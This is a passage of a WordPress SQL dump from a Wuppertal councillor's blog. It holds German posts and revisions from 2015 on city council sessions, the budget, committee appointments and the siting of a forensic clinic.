14.12.2015 verabschiedet zu werden.\r\nAb Mittwoch, den 28.10.2015, können die Wuppertaler Bürger über den Haushaltsentwurf und die Fortschreibung des Haushaltsanierungsplan zu informieren und sich zu beteiligen.\r\nDazu findet am Mittwoch, den 28.10.2015, um 19:30 Uhr im Haus der Jugend eine erste Informationsveranstaltung statt, in der Dr. Slawig das Zahlenwerk erläutert.\r\nBis zum 20.11. können sich Bürger und Bürgerinnen online und auf verschiedenen Veranstaltungen an den Beratungen beteiligen.\r\n\r\nQuelle: Stadt Wuppertal','Haushaltberatungen','','inherit','open','open','','326-revision-v1','','','2015-10-23 13:43:46','2015-10-23 11:43:46','',326,'http://www.ollital.de/wordpress/index.php/2015/10/326-revision-v1/',0,'revision','',0),(331,2,'2015-10-27 22:29:09','2015-10-27 21:29:09','Der erste Tagesordnungspunkt der heutigen Sonderratssitzung war die Vereidigung unseres neuen Oberbürgermeisters Andreas Mucke.\r\nIn seiner Antrittsrede zeigte er sich zufrieden, dass der Kämmerer heute den ersten ausgeglichenen Haushalt seit 25 Jahren eingebracht hat.\r\nSchwerpunkte seiner Arbeit sind Stärkung der Bürgerbeteiligung, mehr Respekt untereinander, Bildung und Familie, U3 Betreuung und Stärkung des Arbeitsmarktes,\r\nQuartierentwicklung und starke Stadtentwicklung.\r\n\r\nDesweiteren bezeichnete er das Seilbahnprojekt als Test für Bürgerbeteiligung.\r\nZitat: \"Flüchtlinge sind in Wuppertal willkommen, ohne Wenn und Aber\"\r\nDr. Slawik brachte danach den Haushalt für die Jahre 2016/17 ein. Im aktuellen Jahr lag der Fehlbetrag in alen Monaten relativ konstant bei ca. 20 Mio EUR. Bis 2017 muss ein ausgeglichener Haushalt erreicht werden. Der eingebrachte Haushalt war nur möglich, weil durch höhere Zuschüsse von Bund und Land für die Flüchtlingsunterbringung eine ausreichend verlässliche Planung zu gewährleisten.\r\nDie Schwerpunkte des Haushaltplan liegen auf den Themen Wirtschaftsförderung, Projekt Döppersberg, Soziale Stadt.\r\n\r\nDie Wuppertaler Bühnen erhalten einen um 80.0000 EUR höheren Betriebskostenzuschuss.\r\nDie Vorgaben des Stärkungspakts werden ohne Steuererhöhungen und Einsparungen erfüllt.\r\nMehr oder weniger nebenbei wurde Herr Prof. Dr. Norbert Hüttenhölscher zum neuen Vertreter der WSW in der Gesellschafterversammlung der Wuppertaler Quartierentwicklungsgesellschaft einstimmig gewählt, um den freigewordenen Posten von Andreas Mucke zu besetzen.\r\n','Vereidigung und Haushalt','','publish','open','open','','vereidigung-und-haushalt','','','2015-10-27 22:31:32','2015-10-27 21:31:32','',0,'http://www.ollital.de/wordpress/?p=331',0,'post','',0),(336,2,'2015-10-27 22:29:09','2015-10-27 21:29:09','Der erste Tagesordnungspunkt der heutigen Sonderratssitzung war die Vereidigung unseres neuen Oberbürgermeisters Andreas Mucke.\r\nIn seiner Antrittsrede zeigte er sich zufrieden, dass der Kämmerer heute den ersten ausgeglichenen Haushalt seit 25 Jahren eingebracht hat.\r\nSchwerpunkte Stärkung der Bürgerbeteiligung, mehr Respekt untereinander, Bildung und Familie, U3 Betreuung und Stärkung des Arbeitsmarktes,\r\nQuartierentwicklung und starke Stadtentwicklung.\r\n\r\nDesweiteren bezeichnete er das Seilbahnprojekt als Test für Bürgerbeteiligung.\r\nZitat: \"Flüchtlinge sind in Wuppertal willkommen, ohne Wenn und Aber\"\r\nDr. Slawik brachte danach den Haushalt für die Jahre 2016/17 ein. Im aktuellen Jahr lag der Fehlbetrag in alen Monaten relativ konstant bei ca. 20 Mio EUR. Bis 2017 muss ein ausgeglichener Haushalt erreicht werden. Der eingebrachte Haushalt war nur möglich, weil durch höhere Zuschüsse von Bund und Land für die Flüchtlingsunterbringung eine ausreichend verlässliche Planung zu gewährleisten.\r\nDie Schwerpunkte des Haushaltplan liegen auf den Themen Wirtschaftsförderung, Projekt Döppersberg, Soziale Stadt.\r\n\r\nDie Wuppertaler Bühnen erhalten einen um 80.0000 EUR höheren Betriebskostenzuschuss.\r\nDie Vorgaben des Stärkungspakts werden ohne Steuererhöhungen und Einsparungen erfüllt.\r\nMehr oder weniger nebenbei wurde Herr Prof. Dr. Norbert Hüttenhölscher zum neuen Vertreter der WSW in der Gesellschafterversammlung der Wuppertaler Quartierentwicklungsgesellschaft einstimmig gewählt, um den freigewordenen Posten von Andreas Mucke zu besetzen.\r\n','Vereidigung und Haushalt','','inherit','open','open','','331-revision-v1','','','2015-10-27 22:29:09','2015-10-27 21:29:09','',331,'http://www.ollital.de/wordpress/index.php/2015/10/331-revision-v1/',0,'revision','',0),(337,2,'2015-10-27 22:31:32','2015-10-27 21:31:32','Der erste Tagesordnungspunkt der heutigen Sonderratssitzung war die Vereidigung unseres neuen Oberbürgermeisters Andreas Mucke.\r\nIn seiner Antrittsrede zeigte er sich zufrieden, dass der Kämmerer heute den ersten ausgeglichenen Haushalt seit 25 Jahren eingebracht hat.\r\nSchwerpunkte seiner Arbeit sind Stärkung der Bürgerbeteiligung, mehr Respekt untereinander, Bildung und Familie, U3 Betreuung und Stärkung des Arbeitsmarktes,\r\nQuartierentwicklung und starke Stadtentwicklung.\r\n\r\nDesweiteren bezeichnete er das Seilbahnprojekt als Test für Bürgerbeteiligung.\r\nZitat: \"Flüchtlinge sind in Wuppertal willkommen, ohne Wenn und Aber\"\r\nDr. Slawik brachte danach den Haushalt für die Jahre 2016/17 ein. Im aktuellen Jahr lag der Fehlbetrag in alen Monaten relativ konstant bei ca. 20 Mio EUR. Bis 2017 muss ein ausgeglichener Haushalt erreicht werden. Der eingebrachte Haushalt war nur möglich, weil durch höhere Zuschüsse von Bund und Land für die Flüchtlingsunterbringung eine ausreichend verlässliche Planung zu gewährleisten.\r\nDie Schwerpunkte des Haushaltplan liegen auf den Themen Wirtschaftsförderung, Projekt Döppersberg, Soziale Stadt.\r\n\r\nDie Wuppertaler Bühnen erhalten einen um 80.0000 EUR höheren Betriebskostenzuschuss.\r\nDie Vorgaben des Stärkungspakts werden ohne Steuererhöhungen und Einsparungen erfüllt.\r\nMehr oder weniger nebenbei wurde Herr Prof. Dr. Norbert Hüttenhölscher zum neuen Vertreter der WSW in der Gesellschafterversammlung der Wuppertaler Quartierentwicklungsgesellschaft einstimmig gewählt, um den freigewordenen Posten von Andreas Mucke zu besetzen.\r\n','Vereidigung und Haushalt','','inherit','open','open','','331-revision-v1','','','2015-10-27 22:31:32','2015-10-27 21:31:32','',331,'http://www.ollital.de/wordpress/index.php/2015/10/331-revision-v1/',0,'revision','',0),(339,2,'2015-11-09 18:14:20','2015-11-09 17:14:20','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf unnötig verzögert. Meinen Glückwunsch an Carsten Gerhardt.\r\nDie Sanierungssatzung für den Kernbereich Heckinghausen ist jetzt beschlossen.\r\nIm Schulentwicklungsplan für weiterführende Schulen ist die Unterstützung der Hauptschulen festgeschrieben und essend keine weiteren Schulen geschlossen.\r\nDas Ergebnis der geheimen Abstimmung zur Begleitkommission für den Kinder- und Jugendförderplan muß ich nachliefern, da die Verkündung zu schnell für mich ablief.\r\n\r\n','Ratssitzung vom 09.11.2015','','publish','open','open','','ratssitzung-vom-09-11-2015','','','2015-11-09 18:14:20','2015-11-09 17:14:20','',0,'http://www.ollital.de/wordpress/?p=339',0,'post','',0),(340,2,'2015-11-09 16:49:09','2015-11-09 15:49:09','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf verzögert. Meinen Glückwunsch an Carsten Gerhardt.','Ratssitzung vom 09.11.2015','','inherit','open','open','','339-revision-v1','','','2015-11-09 16:49:09','2015-11-09 15:49:09','',339,'http://www.ollital.de/wordpress/index.php/2015/11/339-revision-v1/',0,'revision','',0),(341,2,'2015-11-09 16:50:22','2015-11-09 15:50:22','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf verzögert. Meinen Glückwunsch an Carsten Gerhardt.\r\nDie Sanierungssatzung für den Kernbereich Heckinghausen ist jetzt beschlossen.\r\n','Ratssitzung vom 09.11.2015','','inherit','open','open','','339-revision-v1','','','2015-11-09 16:50:22','2015-11-09 15:50:22','',339,'http://www.ollital.de/wordpress/index.php/2015/11/339-revision-v1/',0,'revision','',0),(342,2,'2015-11-09 16:53:32','2015-11-09 15:53:32','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf verzögert. Meinen Glückwunsch an Carsten Gerhardt.\r\nDie Sanierungssatzung für den Kernbereich Heckinghausen ist jetzt beschlossen.\r\nIm Schulentwicklungsplan für weiterführende Schulen ist die Unterstützung der Hauptschulen festgeschrieben und essend keine weiteren Schulen geschlossen.','Ratssitzung vom 09.11.2015','','inherit','open','open','','339-revision-v1','','','2015-11-09 16:53:32','2015-11-09 15:53:32','',339,'http://www.ollital.de/wordpress/index.php/2015/11/339-revision-v1/',0,'revision','',0),(343,2,'2015-11-09 17:34:50','2015-11-09 16:34:50','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf verzögert. Meinen Glückwunsch an Carsten Gerhardt.\r\nDie Sanierungssatzung für den Kernbereich Heckinghausen ist jetzt beschlossen.\r\nIm Schulentwicklungsplan für weiterführende Schulen ist die Unterstützung der Hauptschulen festgeschrieben und essend keine weiteren Schulen geschlossen.\r\nIn die Begleitkommission für den Kinder- und Jugendförderplan werden nach geheimer Abstimmung entsandt: engien, ramette','Ratssitzung vom 09.11.2015','','inherit','open','open','','339-revision-v1','','','2015-11-09 17:34:50','2015-11-09 16:34:50','',339,'http://www.ollital.de/wordpress/index.php/2015/11/339-revision-v1/',0,'revision','',0),(344,2,'2015-11-09 17:35:08','2015-11-09 16:35:08','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf verzögert. Meinen Glückwunsch an Carsten Gerhardt.\r\nDie Sanierungssatzung für den Kernbereich Heckinghausen ist jetzt beschlossen.\r\nIm Schulentwicklungsplan für weiterführende Schulen ist die Unterstützung der Hauptschulen festgeschrieben und essend keine weiteren Schulen geschlossen.\r\nIn die Begleitkommission für den Kinder- und Jugendförderplan werden nach geheimer Abstimmung entsandt: engien, ramette, vogler','Ratssitzung vom 09.11.2015','','inherit','open','open','','339-revision-v1','','','2015-11-09 17:35:08','2015-11-09 16:35:08','',339,'http://www.ollital.de/wordpress/index.php/2015/11/339-revision-v1/',0,'revision','',0),(345,2,'2015-11-09 18:14:20','2015-11-09 17:14:20','Der Stadtrat hat heute endlich die Verleihung des Ehrenrings an Dr. Carsten Gerhardt für sein Engagement bei der Nordbahntrasse beschlossen. Der Antrag wurde erfolgreich seitens der \"GroKo\" über den OB Wahlkampf unnötig verzögert. Meinen Glückwunsch an Carsten Gerhardt.\r\nDie Sanierungssatzung für den Kernbereich Heckinghausen ist jetzt beschlossen.\r\nIm Schulentwicklungsplan für weiterführende Schulen ist die Unterstützung der Hauptschulen festgeschrieben und essend keine weiteren Schulen geschlossen.\r\nDas Ergebnis der geheimen Abstimmung zur Begleitkommission für den Kinder- und Jugendförderplan muß ich nachliefern, da die Verkündung zu schnell für mich ablief.\r\n\r\n','Ratssitzung vom 09.11.2015','','inherit','open','open','','339-revision-v1','','','2015-11-09 18:14:20','2015-11-09 17:14:20','',339,'http://www.ollital.de/wordpress/index.php/2015/11/339-revision-v1/',0,'revision','',0),(346,2,'2015-11-10 21:49:14','2015-11-10 20:49:14','In einer Pressemitteilung teilte die Ratsgruppe der AfD heute mit, dass die Stadtverordneten Ralf Wegener und Bettina Lünsmann aus der AfD ausgetreten sind. Die beiden Mandatsträger machen unter dem neuen Namen \"Allianz für Wuppertal\" weiter, so dass sich an der Zusammensetzung des Rats nichts ändern wird.\r\n','AfD Ratsgruppe firmiert um','','publish','open','open','','afd-ratsgruppe-firmiert-um','','','2015-11-11 07:17:12','2015-11-11 06:17:12','',0,'http://www.ollital.de/wordpress/?p=346',0,'post','',0),(347,2,'2015-11-10 21:49:14','2015-11-10 20:49:14','In einer Pressemitteilung teilte die Ratsgruppe der AfD heute mit, dass die Stadtverordneten Ralf Wegener und Bettina Lünsmann aus der AfD ausgetreten sind. Die beiden Mandatsträger machen unter dem neuen Namen \"Allianz für Wuppertal\" weiter, so dass sich an der Zusammensetzung des Rats nicts ändern wird.\r\n','AfD Ratsgruppe firmiert um','','inherit','open','open','','346-revision-v1','','','2015-11-10 21:49:14','2015-11-10 20:49:14','',346,'http://www.ollital.de/wordpress/index.php/2015/11/346-revision-v1/',0,'revision','',0),(348,2,'2015-11-11 07:17:12','2015-11-11 06:17:12','In einer Pressemitteilung teilte die Ratsgruppe der AfD heute mit, dass die Stadtverordneten Ralf Wegener und Bettina Lünsmann aus der AfD ausgetreten sind. Die beiden Mandatsträger machen unter dem neuen Namen \"Allianz für Wuppertal\" weiter, so dass sich an der Zusammensetzung des Rats nichts ändern wird.\r\n','AfD Ratsgruppe firmiert um','','inherit','open','open','','346-revision-v1','','','2015-11-11 07:17:12','2015-11-11 06:17:12','',346,'http://www.ollital.de/wordpress/index.php/2015/11/346-revision-v1/',0,'revision','',0),(349,2,'2015-11-11 15:12:32','2015-11-11 14:12:32','Als Nachlieferung hier das Ergebnis der geheimen Abstimmung der Ratssitzung vom 09.11.2015\r\n\r\nDie Begleitkommission zum Jugend- und Förderplan ist wie folgt besetzt:\r\n\r\n[table id=2 /]\r\n\r\nBeratendes Mitglied\r\nPRO Deutschland /DIE REPUBLIKANER\r\n1. Herr Stv. Thomas Kik -\r\nBeratendes Mitglied gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nSodann wählt der Rat die von der WfW-Fraktion benannte Frau Heidrun Leermann in offener Abstimmung zum beratenden Mitglied der\r\nBegleitkommission gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nEntsprechend des erfolgten Einigungsverfahrens der Fraktionen zu Beginn der Kommunalwahlperiode und der nach d’Hondt erstellten Liste ist Herr Stadtverordneter Paul Yves Ramette (BÜNDNIS 90/DIE GRÜNEN) Vorsitzender Begleitkommission für den Kinder- und Jugendförderplan 2015-2019.','Besetzung der Begleitkommission Jugend- und Kinderförderplan','','publish','open','open','','besetzung-der-begleitkommission-jugend-und-kinderforderplan','','','2015-11-23 12:22:11','2015-11-23 11:22:11','',0,'http://www.ollital.de/wordpress/?p=349',0,'post','',0),(350,2,'2015-11-11 15:12:32','2015-11-11 14:12:32','Als Nachlieferung hier das Ergebnis der geheimen Abstimmung der Ratssitzung vom 09.11.2015\r\n\r\nDie Begleitkommission zum Jugend- und Förderplan ist wie folgt besetzt:\r\n\r\nStimmberechtigte Mitglieder\r\nStellvertretende Mitglieder\r\nSPD\r\n Frau Stv. Dilek Engin, Herr Volker Vogeler\r\n Vetrtreter\r\nHerr Max Guder, Mascha Hausmanns\r\nCDU\r\nHerr Stv. Michael Hornung, Herr Lutz Middelberg\r\n\r\nVertreter\r\nHerr Stv. Eckhard Klesser,Herr Frank Gottsmann\r\n\r\nGRÜNE\r\nHerr Stv. Paul Yves Ramette\r\n\r\nVertreter\r\nFrau Verena Gabriel\r\n\r\nLINKE\r\nHerr Dr. Dirk Krüger\r\n\r\nVertreter\r\nHerr Ludger Pilgram\r\n\r\nFDP\r\n1. Frau Stv. Karin van der Most\r\n\r\nVertreter\r\nFrau Gabriele Röder\r\n\r\nBeratendes Mitglied\r\nPRO Deutschland /DIE REPUBLIKANER\r\n1. Herr Stv. Thomas Kik -\r\nBeratendes Mitglied gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nSodann wählt der Rat die von der WfW-Fraktion benannte Frau Heidrun Leermann in offener Abstimmung zum beratenden Mitglied der\r\nBegleitkommission gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nEntsprechend des erfolgten Einigungsverfahrens der Fraktionen zu Beginn der Kommunalwahlperiode und der nach d’Hondt erstellten Liste ist Herr Stadtverordneter Paul Yves Ramette (BÜNDNIS 90/DIE GRÜNEN) Vorsitzender Begleitkommission für den Kinder- und Jugendförderplan 2015-2019.\r\n\r\n','Besetzung der Begleitkommission Jugend- und Kinderförderplan','','inherit','open','open','','349-revision-v1','','','2015-11-11 15:12:32','2015-11-11 14:12:32','',349,'http://www.ollital.de/wordpress/index.php/2015/11/349-revision-v1/',0,'revision','',0),(354,2,'2015-11-13 16:17:35','2015-11-13 15:17:35','In der letzten Ratssitzung wurde von unserer Fraktion kritisiert, dass der Geschäftsbericht der Wuppertaler Sparkasse nur in gedruckter Form an die Stadtverordneten verteilt wurde und ein Antrag gestellt, diesen auch als PDF für die Allgemeinheit zugänglich zu machen.\r\n\r\nDieser ist jetzt im RIS abrufbar.','Geschäftsbericht der Wuppertaler Sparkasse','','publish','open','open','','geschaftsbericht-der-wuppertaler-sparkasse','','','2015-11-13 16:17:35','2015-11-13 15:17:35','',0,'http://www.ollital.de/wordpress/?p=354',0,'post','',0),(355,2,'2015-11-13 16:15:02','2015-11-13 15:15:02','In der letzten Ratssitzung wurde von unserer Fraktion kritisiert, dass der Geschäftsbericht der Wuppertaler Sparkasse nur in gedruckter Form an die Stadtverordneten verteilt wurde und ein Antrag gestellt, diesen auch als PDF für die Allgemeinheit zugänglich zu machen.\r\n\r\nDieser ist jetzt hier abrufbar.','Geschäftsbericht der Wuppertaler Sparkasse','','inherit','open','open','','354-revision-v1','','','2015-11-13 16:15:02','2015-11-13 15:15:02','',354,'http://www.ollital.de/wordpress/index.php/2015/11/354-revision-v1/',0,'revision','',0),(356,2,'2015-11-13 16:16:47','2015-11-13 15:16:47','In der letzten Ratssitzung wurde von unserer Fraktion kritisiert, dass der Geschäftsbericht der Wuppertaler Sparkasse nur in gedruckter Form an die Stadtverordneten verteilt wurde und ein Antrag gestellt, diesen auch als PDF für die Allgemeinheit zugänglich zu machen.\r\n\r\nDieser ist jetzt im RIS abrufbar.','Geschäftsbericht der Wuppertaler Sparkasse','','inherit','open','open','','354-revision-v1','','','2015-11-13 16:16:47','2015-11-13 15:16:47','',354,'http://www.ollital.de/wordpress/index.php/2015/11/354-revision-v1/',0,'revision','',0),(358,2,'2015-11-18 15:05:20','2015-11-18 14:05:20','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal #talrat\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat\r\n\r\nStadtverordneter Olli Graf\r\nJohannes-Rau-Platz 1\r\n42275 Wuppertal\r\n01523/7419093\r\nollirat@ollital.de\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-11-18 15:05:20','2015-11-18 14:05:20','',74,'http://www.ollital.de/wordpress/index.php/2015/11/74-revision-v1/',0,'revision','',0),(359,2,'2015-11-18 15:43:14','2015-11-18 14:43:14','Olli Graf, Wuppertaler gebürtig und aus Überzeugung.\r\nJahrgang 1969\r\nDipl. Inform. (FH)\r\nPirat\r\nStadtverordneter im Rat der Stadt Wuppertal #talrat\r\nAuschuss für Stadtentwicklung, Wirtschaft und Bauen\r\nBetriebsauschuss Gebäudemanagement Wuppertal\r\nMitglied in der Fraktion BÜNDNIS 90 / Die Grünen im Stadtrat\r\n\r\nStadtverordneter Olli Graf\r\nJohannes-Rau-Platz 1\r\n42275 Wuppertal\r\n01523/4719093\r\nollirat@ollital.de\r\n','Über mich','','inherit','open','open','','74-revision-v1','','','2015-11-18 15:43:14','2015-11-18 14:43:14','',74,'http://www.ollital.de/wordpress/index.php/2015/11/74-revision-v1/',0,'revision','',0),(363,2,'2015-11-23 11:57:49','2015-11-23 10:57:49','[[\"Name\",\"Vorname\",\"Fraktion\",\"Ausschuss\",\"Partei\"],[\"Graf\",\"Olli\",\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\",\"StaWiBau\",\"Piraten\"],[\"Schulz \",\"Marc\",\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\",\"Schulausschuss\",\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\"]]','Testtable','nur ein Test','publish','closed','closed','','testtable','','','2015-11-23 12:01:40','2015-11-23 11:01:40','',0,'http://www.ollital.de/wordpress/?post_type=tablepress_table&p=363',0,'tablepress_table','application/json',0),(364,2,'2015-11-23 12:01:40','2015-11-23 11:01:40','[[\"Name\",\"Vorname\",\"Fraktion\",\"Ausschuss\",\"Partei\"],[\"Graf\",\"Olli\",\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\",\"StaWiBau\",\"Piraten\"],[\"Schulz \",\"Marc\",\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\",\"Schulausschuss\",\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\"]]','Testtable','nur ein Test','inherit','closed','closed','','363-revision-v1','','','2015-11-23 12:01:40','2015-11-23 11:01:40','',363,'http://www.ollital.de/wordpress/index.php/2015/11/363-revision-v1/',0,'revision','',0),(367,2,'2015-11-23 12:15:28','2015-11-23 11:15:28','[[\"Partei\",\"Mitglieder\",\"Stellvertreter\"],[\"SPD\",\"Dilek Engin, Volker Vogeler\",\"Max Guder, Mascha Hausmanns\"],[\"CDU\",\"Michael Hornung, Lutz Middelberg\",\"Eckhard Klesser, Frank Gottsmann\"],[\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\",\"Paul Yves Ramette\",\"Verena Gabriel\"],[\"Die Linke\",\"Dr. Dirk Kr\\u00fcger\",\"Ludger Pilgram\"],[\"FDP\",\"Karin van der Most\",\"Gabriele R\\u00f6der\"]]','Besetzung der Begleitkommission Jugend- und Kinderförderplan','Ergebnis der geheimen Wahl vom 09.11.2015','publish','closed','closed','','besetzung-der-begleitkommission-jugend-und-kinderforderplan','','','2015-11-23 14:54:28','2015-11-23 13:54:28','',0,'http://www.ollital.de/wordpress/?post_type=tablepress_table&p=367',0,'tablepress_table','application/json',0),(368,2,'2015-11-23 12:20:07','2015-11-23 11:20:07','[[\"Partei\",\"Mitglieder\",\"Stellvertreter\"],[\"SPD\",\"Dilek Engin, Volker Vogeler\",\"Max Guder, Mascha Hausmanns\"],[\"CDU\",\"Michael Hornung, Lutz Middelberg\",\"Eckhard Klesser, Frank Gottsmann\"],[\"B\\u00fcndnis 90 \\/ Die Gr\\u00fcnen\",\"Paul Yves Ramette\",\"Verena Gabriel\"],[\"Die Linke\",\"Dr. Dirk Kr\\u00fcger\",\"Ludger Pilgram\"],[\"FDP\",\"Karin van der Most\",\"Gabriele R\\u00f6der\"]]','Besetzung der Begleitkommission Jugend- und Kinderförderplan','Ergebnis der geheimen Wahl vom 09.11.2015','inherit','closed','closed','','367-revision-v1','','','2015-11-23 12:20:07','2015-11-23 11:20:07','',367,'http://www.ollital.de/wordpress/index.php/2015/11/367-revision-v1/',0,'revision','',0),(369,2,'2015-11-23 12:20:31','2015-11-23 11:20:31','Als Nachlieferung hier das Ergebnis der geheimen Abstimmung der Ratssitzung vom 09.11.2015\r\n\r\nDie Begleitkommission zum Jugend- und Förderplan ist wie folgt besetzt:\r\n\r\n[table id=2 /]\r\n\r\nStimmberechtigte Mitglieder\r\nStellvertretende Mitglieder\r\nSPD\r\nFrau Stv. Dilek Engin, Herr Volker Vogeler\r\nVetrtreter\r\nHerr Max Guder, Mascha Hausmanns\r\nCDU\r\nHerr Stv. Michael Hornung, Herr Lutz Middelberg\r\n\r\nVertreter\r\nHerr Stv. Eckhard Klesser,Herr Frank Gottsmann\r\n\r\nGRÜNE\r\nHerr Stv. Paul Yves Ramette\r\n\r\nVertreter\r\nFrau Verena Gabriel\r\n\r\nLINKE\r\nHerr Dr. Dirk Krüger\r\n\r\nVertreter\r\nHerr Ludger Pilgram\r\n\r\nFDP\r\n1. Frau Stv. Karin van der Most\r\n\r\nVertreter\r\nFrau Gabriele Röder\r\n\r\nBeratendes Mitglied\r\nPRO Deutschland /DIE REPUBLIKANER\r\n1. Herr Stv. Thomas Kik -\r\nBeratendes Mitglied gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nSodann wählt der Rat die von der WfW-Fraktion benannte Frau Heidrun Leermann in offener Abstimmung zum beratenden Mitglied der\r\nBegleitkommission gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nEntsprechend des erfolgten Einigungsverfahrens der Fraktionen zu Beginn der Kommunalwahlperiode und der nach d’Hondt erstellten Liste ist Herr Stadtverordneter Paul Yves Ramette (BÜNDNIS 90/DIE GRÜNEN) Vorsitzender Begleitkommission für den Kinder- und Jugendförderplan 2015-2019.','Besetzung der Begleitkommission Jugend- und Kinderförderplan','','inherit','closed','closed','','349-autosave-v1','','','2015-11-23 12:20:31','2015-11-23 11:20:31','',349,'http://www.ollital.de/wordpress/index.php/2015/11/349-autosave-v1/',0,'revision','',0),(370,2,'2015-11-23 12:22:11','2015-11-23 11:22:11','Als Nachlieferung hier das Ergebnis der geheimen Abstimmung der Ratssitzung vom 09.11.2015\r\n\r\nDie Begleitkommission zum Jugend- und Förderplan ist wie folgt besetzt:\r\n\r\n[table id=2 /]\r\n\r\nBeratendes Mitglied\r\nPRO Deutschland /DIE REPUBLIKANER\r\n1. Herr Stv. Thomas Kik -\r\nBeratendes Mitglied gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nSodann wählt der Rat die von der WfW-Fraktion benannte Frau Heidrun Leermann in offener Abstimmung zum beratenden Mitglied der\r\nBegleitkommission gemäß § 58 Absatz 1 Satz 7 GO NRW.\r\n\r\nEntsprechend des erfolgten Einigungsverfahrens der Fraktionen zu Beginn der Kommunalwahlperiode und der nach d’Hondt erstellten Liste ist Herr Stadtverordneter Paul Yves Ramette (BÜNDNIS 90/DIE GRÜNEN) Vorsitzender Begleitkommission für den Kinder- und Jugendförderplan 2015-2019.','Besetzung der Begleitkommission Jugend- und Kinderförderplan','','inherit','closed','closed','','349-revision-v1','','','2015-11-23 12:22:11','2015-11-23 11:22:11','',349,'http://www.ollital.de/wordpress/index.php/2015/11/349-revision-v1/',0,'revision','',0),(371,2,'2015-11-25 13:23:30','2015-11-25 12:23:30','Als Standort für die geplante Forensik im Langerichtsbezirk Wuppertal ist die Kleine Höhe vorgesehen.   Dies wurde heute auf einer Pressekonferenz der zuständigen Ministerin Steffens bekanntgegeben.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen.Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen den Bau auf dem Gelände der Bereitschaftspolizei gewehrt.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnahme die kleine Höhe als Standort nicht für besser geeignet als die Müngstener Strasse und kritisiert die Blockadehaltung des ehemaligen Oberbürgermeisters Jung zu dem Thema.','Standort für die Forensik','','publish','open','open','','standort-fur-die-forensik','','','2015-11-25 14:07:34','2015-11-25 13:07:34','',0,'http://www.ollital.de/wordpress/?p=371',0,'post','',0),(372,2,'2015-11-25 07:36:35','2015-11-25 06:36:35','Die \"GroKo\"  schafft Baurecht auf der kleinen Höhe, um für die Forensik einen alternativen Standort zur Müngstener Strasse zu schaffen. Letzteren hatte das NRW-Ministerium für Gesundheit, Emanzipation, Pflege und Alter bisher favorisiert. Damit stellt sich die \"GroKo\"\r\n\r\ngegen den einstimmigen Beschluss der BV Uellendahl-Katernberg, die schon seit langem jede Bebauung der Fläche auf der kleinen Fläche anlehnt.\r\n\r\nGemessen am Kritienkatalog des Ministeriums müsste der Standort an der kleinen Höhe gegenüber der Müngstener Strasse bevorzugt werden.','Standort für die Forensik','','inherit','closed','closed','','371-revision-v1','','','2015-11-25 07:36:35','2015-11-25 06:36:35','',371,'http://www.ollital.de/wordpress/index.php/2015/11/371-revision-v1/',0,'revision','',0),(373,2,'2015-11-25 08:59:32','2015-11-25 07:59:32','Die \"GroKo\"  schafft Baurecht auf der kleinen Höhe, um für die Forensik einen alternativen Standort zur Müngstener Strasse zu schaffen. Letzteren hatte das NRW-Ministerium für Gesundheit, Emanzipation, Pflege und Alter bisher favorisiert. Damit stellt sich die \"GroKo\"\r\n\r\ngegen den einstimmigen Beschluss der BV Uellendahl-Katernberg, die schon seit langem jede Bebauung der Fläche auf der kleinen Fläche anlehnt.\r\n\r\nIm letzten April hatte die Bergische Diakonie Aprath ihr Angebot, die forensische Klinik auf ihrem Gelände zu bauen, zurückgezogen. Im April hatte der Stadtrat den Bau der Forensik auf Lichtscheid mit großer Mehrheit abgelehnt. Auch eine Bürgerinitiative hatte sich gegen\r\ndiesen Standort gewehrt.\r\n\r\nGemessen an den Anforderungen des Ministeriums müsste der Standort an der kleinen Höhe gegenüber der Müngstener Strasse jetzt bevorzugt werden.\r\n\r\nDie Fraktion Bündnis 90 / Die Grünen hält in einer Stellungnajhme die kleine 